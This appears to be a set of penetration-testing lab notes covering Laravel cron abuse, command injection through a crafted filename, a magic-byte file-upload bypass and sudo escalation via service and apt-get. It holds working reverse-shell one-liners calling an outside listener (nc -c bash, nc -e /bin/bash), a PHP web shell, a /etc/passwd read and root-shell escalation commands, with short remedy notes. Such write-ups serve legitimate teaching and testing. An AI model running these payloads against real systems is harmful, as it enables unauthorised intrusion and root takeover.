laravel – schedule task – crontab

Laravel is a web application framework with expressive, elegant syntax.

https://www.easylaravelbook.com/blog/introducing-the-laravel-5-command-scheduler/

https://laravel.com/docs/5.8/scheduling#scheduling-artisan-commands

The Laravel command scheduler allows you to manage your task execution dates and times using easily understandable PHP syntax. You'll manage the task execution definitions in app/Console/Kernel.php

Scheduling Your Command

As was perhaps made obvious by the earlier example, scheduling your command within app/Console/Kernel.php is easy. If you'd like amazon:update to run hourly, you'll use the hourly method

Updating Amazon product information hourly seems a bit aggressive. Fortunately, you have plenty of other options. To run a command on a daily basis (midnight), use daily:

To run it at a specific time, use the dailyAt method:

If you need to run a command very frequently, you can use an every method:

Enabling the Scheduler

With your tasks created and scheduled, you'll need to add a single entry to your server's crontab file:

Execute terminal commands

You can optionally define some logic for execution directly within the schedule method:

Schedule Frequency

Execution

1. I noticed in crontab that there is a task for laravel

2. I modified the file Kernel.php located in app/Console

3. I ran a reverse shell, without & at the end the communication closes. Make sure to use it like that to run in background.

4. Having already a listener in place wait for communication as the Kernel.php is executed every minute

Using crontab and command injection privilege escalation

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application.

https://owasp.org/www-community/attacks/Command_Injection

The cron daemon is a long-running process that executes commands at specific dates and times. For commands that need to be executed repeatedly (e.g., hourly, daily, or weekly), you can use the crontab

Each entry in a crontab file consists of six fields

  • minute(s) hour(s) day(s) month(s) weekday(s) command(s)

Field Value Description

minute 0-59 The exact minute that the command sequence executes

hour 0-23 The hour of the day that the command sequence executes

day 1-31 The day of the month that the command sequence executes

month 1-12 The month of the year that the command sequence executes

weekday 0-6 The day of the week that the command sequence executes (Sunday = 0, etc.)

In this example we have a PHP script that is executed by crontab every 3 minutes

What the PHP script does is check files within a directory, scans that most files have a specific format, if there is any anomaly delete some files.

Code analysis

1. This first block of code does the following.

  • Requires lib.php to run
  • Set the variable $path to set the directory to scan
  • Logs will be written to $logpath variable which is /tmp/attack.log

It then set an empty array as $files, does some regular expression on the result of a “scandir()” function that works as Linux “ls”

2. This second block, with the results, for each result in $files, set a key and a value, if the file index.html is detected just ignore it.

3. In this piece of code, we call the function “getnameCheck” that is in lib.php file, if the result of $check is not valid, use the function “file_put_contents” to write a file and the execute some system commands.

lib.php

check_attack.php

We can now try to exploit this code.

Exploitation

1. Now that we know this scripts executes BASH commands when a file doesn’t pass the check. We will create a suspicious file that executes a reverse shell.

  • touch -- ‘; nc -c bash 10.10.14.37 4444;.php’
  • ls -l

2. Start the listener on Kali/Parrot using netcat

  • nc -lvp 4444

3. Wait for the script to execute and check netcat

Remedy

1. Avoid using PHP system exec functions, and, try to replace them with functions that are PHP embedded

  • use “scandir()” instead of exec(“ls”)

2. Sanitize all user input

  • Block the use of “;”, “&&”, “|” as an example

 

Local file upload – Magic byte change file type

Magic numbers are the first bits of a file which uniquely identify the type of file. it can be helpful to look for file format signatures and inferring how the application is using them based on these signatures, as well as how these formats may be abused to provoke undefined behavior within the application.

To identify these common file format signatures one typically only need to look as far as the first few bytes of the file in question. This is what’s often called “magic bytes”, a term referring to a block of arcane byte values used to designate a filetype in order for applications to be able to detect whether or not the file they plan to parse and consume is of the proper format.

For example, a jpeg file starts with ffd8 ffe0 0010 4a46 4946 0001 0101 0047 ......JFIF..... or ffd8 shows that it's a JPEG file.

  • file image.jpeg
  • file -i image.jpeg
  • xxd image.jpeg | head

Magic numbers (File signatures) are typically not visible to the user, but, can be seen by using a hex editor or by using the ‘xxd’ command to read the file

Changing the values raise a flag for malware or potential damage.

Exploiting file upload functionality with this trick

In this scenario we see a basic php file upload. First we test functionality of the application and capture the requests with a proxy.

1. If we just click on upload and select no file it shows “Invalid image file.” Error

In proxy the response doesn’t show much

We uploaded an image file successfully message received “file uploaded, refresh gallery”

Looking at the gallery we confirm the file is stored in the server and accessible to us.

The image is store by photos.php and displayed in /uploads/ it also changes the name “10_10_14_36.jpeg”. It seems IP address + file extension

Exploiting the upload functionality

1. We will try to upload a simple GET php file.

  • vi shell.php # We name the file shell.php
  • <?php echo shell_exec($_GET[‘cmd’]); ?>

Try to upload it. As a result, we get “invalid image file.” This means the mechanism does somehow file checking.

2. As we have the source code we will determine what is going on in the background. First we search within the files to see what the user can enter

  • grep -Ri ‘$_’ *

We have there “check_file_type” function. And also it checks if “$_POST[‘submit’]” has been set. We will inspect this upload.php file.

The block of code below may indicate the following

  • Check if POST ‘submit’ has been entered, if not empty which means there was a file set the value as the variable $myfile
  • If the result of “check_file_type” is false, display “invalid image file.”, the text we were getting

Now I will inspect “check_file_type” function, I need to find which file includes it

This one shows that lib,php contains that function, so, we are reading that file

  • cat lib.php

In this other block of code within lib.php, we found our function “check_file_type”, this function is dependent on “file_mime_type” to return either true or false.

It seems this one piece of code opens the file raw data and checks the content for its type.

Changing file type

So, now we will change the file content to show our script which is ASCII to show as .gif

For this first we need to look at the list of magic bytes, you can search on the internet.

https://en.wikipedia.org/wiki/List_of_file_signatures

In the contents of the site above we see the codes that represent each format.

GIF8 is used for .gif file so we append that to the beginning of the file

  • GIF8; <?php echo shell_exec($_GET['cmd']); ?>
  • file shell.php

Now we can try to upload the file.

This time we still got blocked and the error message, another mechanism should be verifying the file extension. The error message displayed this time varies a little bit. There is no ending “.”

I found the second verification mechanism within upload.php, if this fails we get “Invalid image file”. There we have the allowed formats jpg, png, gif, jpeg

Now we are changing the file name, and try to upload again:

  • mv shell.php shell.php.gif

We got to upload the file successfully

So far we have bypassed the metadata check mechanism and the file name format verification. Now, you need to locate where the server stores the file and execute

In this case this has been saved in /uploads/10_10_14_36.php.gif

Exploiting the system

As our script needs a GET request we use the URL to enter system commands

  • http://10.10.10.146/uploads/10_10_14_36.php.gif?cmd=cat /etc/passwd

We now know that the script works now a reverse Shell can be executed

1. Start a listener in Kali/Parrot OS

  • nc -lvp 4444

2. in the browser enter a netcat command

  • http://10.10.10.146/uploads/10_10_14_36.php.gif?cmd=nc -e /bin/bash 10.10.14.36 4444

The IP & Port values vary depending on your system IP and Port in use.

Doing this with Burp Suite. Bonus

1. upload the shell.php file we created as it was originally

  • file shell.php
  • cat shell.php

2. Upload the file and capture the request and response using BurpSuite

The Request uses POST we see it in the screenshot, also, there is the filename and its contents.

We will modify the value of the variable “filename” and the contents of the file, our mission is the following:

  • name the file from shell.php to shell.php.gif
  • to insert our magic byte “GIF8” to make it look as a .gif file

The response is the following “file uploaded, refresh gallery”. We didn’t change the file itself it is still being shell.php in our PC, we changed it on the go. We complained with the file being .gif and the file contents were sent as gif (GIF8)

  • file shell.php

Solution

1. There is no authentication or authorization check to make sure that the user has signed in (authentication) and has access to perform a file upload (authorization).

2. When receiving an upload, you can avoid attackers uploading executable PHP or other code by examining your uploads for content. For example, if you are accepting image uploads, call the PHP getimagesize() function on the uploaded file to determine if it is a valid image.

service – Privilege Escalation

Sudo (NOPASSWD) service - Privilege Escalation

If you ever get to run “service” command with root privileges, you can escape from restricted shell to root.

In this example /etc/sudoers has allowed an user to run this program as root without password need.

How to

1. sudo -l

2. Now that we know the command can be run without password need

  • sudo service ../../../bin/bash

 

apt-get – Privilege escalation

apt-get - Privilege escalation

apt-get can be used to escalate privileges when sudo is allowed without password.

How to

1. check the permissions this user has

  • sudo -l

We can see that /usr/bin/apt-get is allowed (NOPASSWD)

2. get into changelog documentation

  • sudo apt-get changelog apt

3. At the bottom type into change to /bin/bash since this document has been opened as root, seems to be “less” Linux utility.

  • !/bin/bash
  • <enter>

After that you immediately change to root log in.

Using apt-get & apt update for privilege escalation

(For this to work the target package (e.g., sl) must not be installed.)

  • TF=$(mktemp)
  • echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' > $TF
  • sudo apt-get install -c $TF sl

How to

1. Having NOPASSWD rights

  • sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/bash
  • whoami

If you type exit the apt-get update command starts to do its job.

2. using apt

  • sudo apt update -o APT::Update::Pre-Invoke::=/bin/bash

For using either apt or apt-get you need sudo access.

sudo -l